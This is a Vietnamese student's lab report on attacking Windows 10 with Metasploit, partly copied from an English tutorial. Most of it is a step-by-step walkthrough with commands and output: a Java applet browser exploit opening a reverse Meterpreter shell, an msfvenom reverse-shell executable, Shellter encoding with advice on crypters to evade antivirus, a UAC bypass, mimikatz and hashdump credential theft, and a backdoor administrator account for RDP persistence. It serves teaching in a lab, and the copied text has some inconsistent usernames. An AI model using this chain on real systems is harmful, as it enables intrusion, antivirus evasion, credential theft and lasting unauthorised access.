KIỂM THỬ XÂM NHẬP VỚI Metasploit

TRÊN HĐH WIN10

Họ và tên Sinh viên: Mai Anh Quân

Mã Sinh viên: 102200227 Nhóm học phần:20Nh14

1. Win 10: exploit/multi/browser/java_jre17_jmxbean.........................................1

2. Win 10: Java Applet JAX-WS Remote Code Execution....................................2
3. Win 10: Google Chrome versions before 87.0.4280.88 (64 bit).........................2
4. Win 10: Google Chrome 67, 68 and 69 Object.create exploit............................2
5. Win 10: Google Chrome 72 and 73 Array.map exploit......................................3
6. Win 10: Malware attack........................................................................................3
6.1. Creating a Malicious.exe File....................................................................................3
6.2. Executable FUD (Fully Undetectable).......................................................................3
6.3. Launching Metasploit................................................................................................4
6.4. Executing the Payload on Windows 10.....................................................................5
6.5. Metasploit..................................................................................................................5
6.6. Privilege Escalation...................................................................................................6
6.7. Persistence..................................................................................................................7

1. Win 10: CVE-2013-042 Java Applet JMX Remote Code

Execution
Khai thác lỗ hổng (0day) java applet jmx remote code execution. Lỗ hổng này lạm
dụng các lớp JMX từ một Applet Java để chạy mã Java tùy ý bên ngoài sandbox và được
khai thác vào tháng 1 năm 2013. Lỗ hổng này ảnh hưởng đến phiên bản Java 7u10 và
trước đó.
Hình thức tấn công này là cho phép khai thác lỗ hổng java trên máy của victim hoặc
gọi là tấn công Client Side. Mô phỏng như sau:
 Attacker tạo ra website. Trên website chạy đoạn mã khai thác lỗi java cho phép
thực thi lệnh nguy hiểm.
 Victim duyệt website của attacker bị thực thi mã nguy hiểm inject code vào hệ
thống.
 Attacker khai thác thông tin trên máy của nạn nhân.

Bước 1: Sử dụng module : exploit/multi/browser/java_jre17_jmxbean

msf > use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean) >

Họ Tên SV
 Bước 2: cấu hình các tham số payloads, LHOST
msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp

msf exploit(java_jre17_jmxbean) > set LHOST 192.168.1.10

LHOST => 192.168.1.10

Bước 3: exploit copy url của website để gửi cho victim

msf exploit(java_jre17_jmxbean) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.10:4444
msf exploit(java_jre17_jmxbean) > [*] Using URL: http://0.0.0.0:8080/vXdjaGu
[*] Local IP: http://192.168.1.10:8080/vXdjaGu
[*] Server started.

Ở đây ta thấy website để khai thác http://192.168.1.10:8080/vXdjaGu. Chúng ta sẽ

gửi qua máy nạn nhân theo url này.
Bước 4: Chờ người dùng duyệt website click
Bước 5: Kiểm tra trên metasploit ta thấy đã có kết nối vào máy victim
[*] Server started.
[*] 10.0.0.14 java_jre17_jmxbean – handling request for /vXdjaGu
[*] 10.0.0.14 java_jre17_jmxbean – handling request for /vXdjaGu/
[*] 10.0.0.14 java_jre17_jmxbean – handling request for /vXdjaGu/NFGXNNgZ.jar
[*] 10.0.0.14 java_jre17_jmxbean – handling request for /vXdjaGu/NFGXNNgZ.jar
[*] Sending stage (30355 bytes) to 10.0.0.14
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 10.0.0.14:49187) at 2014–08–26 00:59:32 –
0400
Meterpreter đang chờ ở session2. Để kết nối chúng ta sử dủng command

msf exploit(java_jre17_jmxbean) > sessions –i 2

[*] Starting interaction with 2…
meterpreter >

Nhận xét: Để phòng chống lỗ hổng này nên update bản java mới nhất, Không chạy
java trên các trang web không tin tưởng.

2. Win 10: CVE-2012-5076 Java Applet JAX-WS Remote Code

Execution
https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/
browser/java_jre17_jaxws

3. Win 10: Google Chrome versions before 87.0.4280.88 (64 bit)

https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/
browser/chrome_simplifiedlowering_overflow

4. Win 10: Google Chrome 67, 68 and 69 Object.create exploit

https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/
browser/chrome_object_create

Họ Tên SV
5. Win 10: Google Chrome 72 and 73 Array.map exploit
https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/
browser/chrome_array_map

6. Win 10: Malware attack

https://resources.infosecinstitute.com/how-to-attack-windows-10-machine-with-
metasploit-on-kali-linux/
Máy Kali linux có địa chỉ 192.168.1.10 (LHOST) sẽ tấn công các máy Win 10 có địa
chỉ 192.168.1.130, 192.168.1.131 (RHOST)

6.1. Creating a Malicious.exe File

To create the executable, you would use msfvenom as shown in the command below:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe
LHOST=192.168.1.10 LPORT=4444 -o ./MalwareXYZ.exe

The command above instructs msfvenom to generate a 32-bit Windows executable file
that implements a reverse TCP connection for the payload. The format must be specified
as being type .exe, and the local host (LHOST) and local port (LPORT) have to be
defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine,
and the LPORT is the port to listen on for a connection from the target once it has been
compromised.
Antivirus solutions work by detecting malicious signatures within executables. Our
file will thus be flagged as malicious once within the Windows environment. We
therefore have to figure out a way to modify it to bypass antivirus detection. We will
encode it to make it fully undetectable, or FUD.

6.2. Executable FUD (Fully Undetectable)

To encode our executable, we shall be using Shellter. Shellter works by changing the
executable’s signatures from the obviously malicious one to a completely new and
unique one that can bypass detection.
Note that antiviruses also check the behavior of executables and employ techniques
such as heuristics scanning, so they are not just limited to checking for signatures. During
our lab tests we discovered that Windows Defender, which ships by default with
Windows 10, flagged the executable 6 out of the 10 times we used Shellter to perform the
encoding. This is despite Windows 10 being a fresh download with latest patches

Họ Tên SV
applied! You will be better off purchasing Shellter Pro (or any Pro Crypter) or writing
your own Crypter to avoid antivirus flagging your executables.
Also note that when writing your own, disable automatic submissions. Otherwise
whatever you write, if detected as potentially-unwanted software, will be uploaded by
your antivirus for analysis … And we both know how that will end.
To launch Shellter just type shellter on the terminal.
You will be required to enter the absolute path to the executable to make FUD. Make
sure to select “Auto” mode.
Shellter will then initialize and run some checks. It will then prompt you whether to
run in stealth mode. Select “Y” for yes.
At this point, the executable you provided will have been made undetectable to
antivirus solutions.
Again, note that you are better off writing your own or purchasing a Crypter that is
constantly being revised. Otherwise, most of your encoding will be flagged as malicious
or potentially unwanted software.

6.3. Launching Metasploit

We now need to set up a listener on the port we determined within the executable. We
do this by launching Metasploit using the command msfconsole on the Kali Linux
terminal.
kali@kali:~$ sudo msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.1.10

LHOST => 192.168.1.10

msf5 exploit(multi/handler) > set LPORT 4444

LPORT => 4444

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.10:4444

The screenshot below displays the output. The reverse TCP handler should begin
waiting for a connection.
The next step is to execute it from a Windows perspective. In a real-world practical
situation, this will require social engineering skills. Nevertheless, copy the something32
to a Windows system within the same network as the Kali system.

Họ Tên SV
6.4. Executing the Payload on Windows 10

On copying the file to our target Windows machine, we have the screen-shot below.
Execute the file.
mstsc /v:192.168.1.130

Đăng nhập từ xa vào máy Win10 với tài khoản user01, 123456. Trên máy Win10, mở
trình duyệt, gõ: ftp://192.168.1.10
=> Tải và chạy file XYZ01.exe

6.5. Metasploit

The executable causes the payload to be executed and connect back to the attacking
machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux.
This is demonstrated by the Meterpreter > prompt as shown below:
[*] Sending stage (180291 bytes) to 192.168.1.16
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.16:49726) at 2021-02-15 06:02:56
-0500

Since the file was not run as “administrator,” there are Meterpreter commands that
can’t be run as they would result in an “access denied” response. This can be confirmed
by running the getuid command, which tells us that we are running as user l3s7r0z.
meterpreter > getuid
Server username: DESKTOP-3L0ADSV\VMWin10

To prove that the user lacks enough privileges, we attempted to run the
command mimikatz_command -f sekurlsa::logonPasswords.
The result is an “Access is denied” message as shown below:
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded x86 Mimikatz on an x64 architecture.
[!] Loaded Mimikatz on a newer OS (Windows 10 (10.0 Build 17134).). Did you mean to 'load kiwi'
instead?
Success.

meterpreter > mimikatz_command -f sekurlsa::logonPasswords

OpenProcess : (0x00000005) Access is denied.
Données LSASS en erreur

In order to gain sufficient rights, we need to perform a UAC bypass. Next we see how
this can be done.

Họ Tên SV
6.6. Privilege Escalation

Privilege escalation allows us to elevate privileges from our less privileged user
(l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all
administrative rights.
Metasploit by default provides us with some methods that allow us to elevate our
privileges. On the Meterpreter prompt we use the getsystem command, as shown below:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was
attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Since the methods used by getsystem all fail, we need an alternative method of
elevating privileges. We will use the comhijack exploit module that is used to bypass
User Access Control. To do so, we “background” our Meterpreter session, switch our
exploit from multi/handler to windows/local/bypassuac_comhijack and implement this
on the session in the background using set SESSION 1.
This is shown below:
meterpreter > background
[*] Backgrounding session 1...

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_comhijack

msf5 exploit(windows/local/bypassuac_comhijack) > set SESSION 1
SESSION => 1

We then set the payload using set payload

windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run
the exploit.
msf5 exploit(windows/local/bypassuac_comhijack) > set payload
windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/local/bypassuac_comhijack) > set LHOST 192.168.1.10

LHOST => 192.168.1.10

msf5 exploit(windows/local/bypassuac_comhijack) > set LPORT 4444

LPORT => 4444

msf5 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 192.168.1.10:4444

[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-
F424491E3931} ...
[*] Uploading payload to C:\Users\VMWin10\AppData\Local\Temp\vldZIZUW.dll ...
[*] Executing high integrity process ...
[*] Sending stage (206403 bytes) to 192.168.1.16

Họ Tên SV
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.16:49729) at 2021-02-15 06:05:43
-0500
[+] Deleted C:\Users\VMWin10\AppData\Local\Temp\vldZIZUW.dll
[*] Cleaining up registry ...

We successfully receive a Meterpreter session. Typing sysinfo shows us the

information of our target. getuid shows that we are running as user l3s7r0z on Windows
10, but we can elevate to SYSTEM by issuing getsystem. We can see that elevation was
successful and we can confirm this by issuing getuid again, we can see we are now NT
AUTHORITY\SYSTEM.
meterpreter > sysinfo
Computer : DESKTOP-3L0ADSV
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > 3
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 10 (10.0 Build 17134).).
Did you mean to 'load kiwi' instead?
Success.

With these privileges, we can do quite a lot on our compromised target. For instance,
we can obtain LM and NTLM password hashes using the hashdump command as shown
above. Note that the format of the hashes above
is USERNAME:SID:LM_HASH:NTLM_HASH:::. We can even obtain credentials
from browsers, key managers, the domain controller, perform keylogging, capture
screenshots and even stream from the webcam (this will not work on VM, it will need an
actual native Windows install target).
Now that we are within the target machine, why not perform some persistence to
remain within?

6.7. Persistence

Persistence allows us to gain access back to the machine whenever we need to even
when the target decides to patch the vulnerability.
There are many ways of performing persistence. For example, we can code a
malicious virus to always connect back to us whenever the target turns on their machine
(this is called a backdoor), or even have our own user accounts within the compromised
target machine. Metasploit also provides its method of persistence, discussed here.

Họ Tên SV
 We’ll go with the second option, to have our own account within the target and enable
RDP so that whenever we want, we can log into the machine and access the information
we want.
Remember the NTLM hashes we were able to obtain above using
the hashdump command from the mimikatz module? We can even log into any account
within the target machine using any password hashes, impersonate legitimate users and
download, alter or upload files.
meterpreter > hashdump
admin:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user01:1006:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
user02:1007:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
VMWin10:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:eb4913bff178a2ccc35d470d52db22a1:::

On the Meterpreter session, we type the command shell to drop into a Windows shell
on the Windows 10 target.
meterpreter > shell

At the C:\WINDOWS\system32> prompt, we issue the net users command. This lists
all the users within the windows machine. As we can see, there are only two users, the
Administrator and the other user.
We add a new user. The command used to do that is:
C:\Windows\system32>net user /add XYZ 123qwe!@#
net user /add XYZ 123qwe!@#
The command completed successfully.

We then add XYZ to the administrators group so that the account can perform admin
functions. The command used is:
C:\Windows\system32>net localgroup administrators XYZ /add
net localgroup administrators XYZ /add
The command completed successfully.

We then add him to the RDP group. This will allow us to log in through RDP to the
target machine, even after it has been patched to have firewall and antivirus on.
The command used is:
C:\Windows\system32>net localgroup "Remote Desktop Users" XYZ /add
net localgroup "Remote Desktop Users" XYZ /add
The command completed successfully.

After all the setup is done for user Jaime, we can use the following command to see
the user’s properties:
C:\Windows\system32>net user XYZ
net user XYZ

Họ Tên SV
User name XYZ
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/15/2021 3:07:31 AM

Password expires 3/29/2021 3:07:31 AM
Password changeable 2/15/2021 3:07:31 AM
Password required Yes
User may change password Yes

Workstations allowed All

Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *Remote Desktop Users

*Users
Global Group memberships *None
The command completed successfully.
C:\Windows\system32>
Remote desktop connection with new user XYZ:

-----------------------------------------------

Họ Tên SV